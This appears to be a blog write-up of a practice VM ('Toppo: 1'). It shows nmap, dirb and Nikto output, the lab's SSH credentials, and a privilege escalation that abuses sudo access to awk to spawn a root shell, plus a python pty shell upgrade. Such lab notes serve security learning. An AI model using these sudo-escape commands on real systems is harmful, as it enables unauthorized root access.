Skip to main content

VM 26. Toppo: 1

root@kali:~/reports/192.168.117.3# cat 192.168.117.3.nmap
# Nmap 7.70 scan initiated Mon Jul 16 13:37:02 2018 as: nmap -sV -O -oN ../repor                                            ts/192.168.117.3/192.168.117.3.nmap 192.168.117.3
Nmap scan report for 192.168.117.3
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
49473/tcp open  unknown
MAC Address: 08:00:27:1E:4A:01 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https                                            ://nmap.org/submit/ .
# Nmap done at Mon Jul 16 13:37:10 2018 -- 1 IP address (1 host up) scanned in 8                                            .66 seconds

0000000000000000000

cat udp_192.168.117.3.nmap
# Nmap 7.70 scan initiated Mon Jul 16 13:37:11 2018 as: nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN ../reports/192.168.117.3/udp_192.168.117.3.nmap 192.168.117.3
Nmap scan report for 192.168.117.3
Host is up (0.00036s latency).
Not shown: 198 closed ports
PORT    STATE         SERVICE VERSION
68/udp  open|filtered dhcpc
111/udp open          rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44313/udp  status
|_  100024  1          49473/tcp  status
MAC Address: 08:00:27:1E:4A:01 (Oracle VirtualBox virtual NIC)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.117.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 16 13:42:23 2018 -- 1 IP address (1 host up) scanned in 313.19 seconds

root@kali:~/reports/192.168.117.3# cat unicorn_udp_192.168.117.3.txt
UDP open 192.168.117.3:111  ttl 64
UDP open                  sunrpc[  111]         from 192.168.117.3  ttl 64

0000000000000000000

root@kali:~/reports/192.168.117.3# cat dirb.txt
+ http://192.168.117.3/index.html (CODE:200|SIZE:6437)
+ http://192.168.117.3/LICENSE (CODE:200|SIZE:1093)
+ http://192.168.117.3/manual/index.html (CODE:200|SIZE:626)
+ http://192.168.117.3/manual/da/index.html (CODE:200|SIZE:9041)
+ http://192.168.117.3/manual/de/index.html (CODE:200|SIZE:9290)
+ http://192.168.117.3/manual/en/index.html (CODE:200|SIZE:9206)
+ http://192.168.117.3/manual/es/index.html (CODE:200|SIZE:9255)
+ http://192.168.117.3/manual/fr/index.html (CODE:200|SIZE:9479)
+ http://192.168.117.3/manual/ja/index.html (CODE:200|SIZE:9649)
+ http://192.168.117.3/manual/ko/index.html (CODE:200|SIZE:8513)
+ http://192.168.117.3/manual/tr/index.html (CODE:200|SIZE:9416)
+ http://192.168.117.3/manual/zh-cn/index.html (CODE:200|SIZE:8884)
+ http://192.168.117.3/manual/da/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/da/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/da/howto/index.html (CODE:200|SIZE:6962)
+ http://192.168.117.3/manual/da/misc/index.html (CODE:200|SIZE:5106)
+ http://192.168.117.3/manual/da/mod/index.html (CODE:200|SIZE:22377)
+ http://192.168.117.3/manual/da/programs/index.html (CODE:200|SIZE:6897)
+ http://192.168.117.3/manual/da/ssl/index.html (CODE:200|SIZE:5049)
+ http://192.168.117.3/manual/de/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/de/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/de/howto/index.html (CODE:200|SIZE:6962)
+ http://192.168.117.3/manual/de/misc/index.html (CODE:200|SIZE:5106)
+ http://192.168.117.3/manual/de/mod/index.html (CODE:200|SIZE:22569)
+ http://192.168.117.3/manual/de/programs/index.html (CODE:200|SIZE:6897)
+ http://192.168.117.3/manual/de/ssl/index.html (CODE:200|SIZE:5049)
+ http://192.168.117.3/manual/en/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/en/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/en/howto/index.html (CODE:200|SIZE:6962)
+ http://192.168.117.3/manual/en/misc/index.html (CODE:200|SIZE:5106)
+ http://192.168.117.3/manual/en/mod/index.html (CODE:200|SIZE:22377)
+ http://192.168.117.3/manual/en/programs/index.html (CODE:200|SIZE:6897)
+ http://192.168.117.3/manual/en/ssl/index.html (CODE:200|SIZE:5049)
+ http://192.168.117.3/manual/es/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/es/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/es/howto/index.html (CODE:200|SIZE:6962)
+ http://192.168.117.3/manual/es/misc/index.html (CODE:200|SIZE:5106)
+ http://192.168.117.3/manual/es/mod/index.html (CODE:200|SIZE:22752)
+ http://192.168.117.3/manual/es/programs/index.html (CODE:200|SIZE:6298)
+ http://192.168.117.3/manual/es/ssl/index.html (CODE:200|SIZE:5049)
+ http://192.168.117.3/manual/fr/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/fr/faq/index.html (CODE:200|SIZE:3604)
+ http://192.168.117.3/manual/fr/howto/index.html (CODE:200|SIZE:7136)
+ http://192.168.117.3/manual/fr/misc/index.html (CODE:200|SIZE:5407)
+ http://192.168.117.3/manual/fr/mod/index.html (CODE:200|SIZE:24329)
+ http://192.168.117.3/manual/fr/programs/index.html (CODE:200|SIZE:7185)
+ http://192.168.117.3/manual/fr/ssl/index.html (CODE:200|SIZE:5191)
+ http://192.168.117.3/manual/ja/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/ja/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/ja/howto/index.html (CODE:200|SIZE:7723)
+ http://192.168.117.3/manual/ja/misc/index.html (CODE:200|SIZE:5106)
+ http://192.168.117.3/manual/ja/mod/index.html (CODE:200|SIZE:23684)
+ http://192.168.117.3/manual/ja/programs/index.html (CODE:200|SIZE:6897)
+ http://192.168.117.3/manual/ja/ssl/index.html (CODE:200|SIZE:5274)
+ http://192.168.117.3/manual/ko/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/ko/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/ko/howto/index.html (CODE:200|SIZE:6373)
+ http://192.168.117.3/manual/ko/misc/index.html (CODE:200|SIZE:5197)
+ http://192.168.117.3/manual/ko/mod/index.html (CODE:200|SIZE:21813)
+ http://192.168.117.3/manual/ko/programs/index.html (CODE:200|SIZE:5773)
+ http://192.168.117.3/manual/ko/ssl/index.html (CODE:200|SIZE:5049)
+ http://192.168.117.3/manual/tr/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/tr/faq/index.html (CODE:200|SIZE:3612)
+ http://192.168.117.3/manual/tr/howto/index.html (CODE:200|SIZE:6962)
+ http://192.168.117.3/manual/tr/misc/index.html (CODE:200|SIZE:5339)
+ http://192.168.117.3/manual/tr/mod/index.html (CODE:200|SIZE:22660)
+ http://192.168.117.3/manual/tr/programs/index.html (CODE:200|SIZE:7405)
+ http://192.168.117.3/manual/tr/ssl/index.html (CODE:200|SIZE:5196)
+ http://192.168.117.3/manual/zh-cn/developer/index.html (CODE:200|SIZE:5995)
+ http://192.168.117.3/manual/zh-cn/faq/index.html (CODE:200|SIZE:3571)
+ http://192.168.117.3/manual/zh-cn/howto/index.html (CODE:200|SIZE:6566)
+ http://192.168.117.3/manual/zh-cn/misc/index.html (CODE:200|SIZE:4807)
+ http://192.168.117.3/manual/zh-cn/mod/index.html (CODE:200|SIZE:22261)
+ http://192.168.117.3/manual/zh-cn/programs/index.html (CODE:200|SIZE:6833)
+ http://192.168.117.3/manual/zh-cn/ssl/index.html (CODE:200|SIZE:5042)

0000000000000000000

cat: tee: No such file or directory

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.117.3
+ Target Hostname:    192.168.117.3
+ Target Port:        80
+ Start Time:         2018-07-16 14:09:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2018-07-16 14:10:02 (GMT-5) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

0000000000000000000
ssh login : ted
pwd: 12345ted123 (was located at one of the page)
3.16.0-4-586 Debian 3.16.51-3
ran priv check....looks like have awk sudo access so ran

 $ awk 'BEGIN {system("/bin/sh")}' to get root shell...Approach 1
0000000000000000000
enter following cmd to escape shell sequence to get root prompt

python -c 'import pty; pty.spawn("/bin/sh")'Approach 2

Comments

Post a Comment

Popular posts from this blog

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...
1 comment
Read more

VM 5: Vulnix :

Walkthru: A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs] B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd] C. https://www.rebootuser.com/?p=988[ local bash shell from nfs] B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions] D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ] Notes: - As you can see the root user is the only account which is logged on the remote  host.Now that we have a specific username we can use it in order to obtain more information about this user with the command  finger root@host . -  Another effective use of the finger...
Post a Comment
Read more

VM 13 : Basic Pentest 1 csec

Notes: Walkthru: 1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [ w/metasploi t using Wordpress t] 2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/ [ w/metasploit using ftp ] 3.  https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [ by uploading php-reverse-shell in wordpress ] 4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [  access wordpress config file to get pwd and access the DB ] 5.  https://cowsayroot.com/walkthrough-basic-pentesting-1/ [ Wpscan, ftp metasploit vulnerability, phpbash ] 6.   http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/    [use msfvenom to create  to create php shell to be uploaded in Wordpress ] 7.   https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP] Notes:  Ports - 21...ProFTPD 1.3.3c - 22 openSSH 7.2p2 ubuntu ...
2 comments
Read more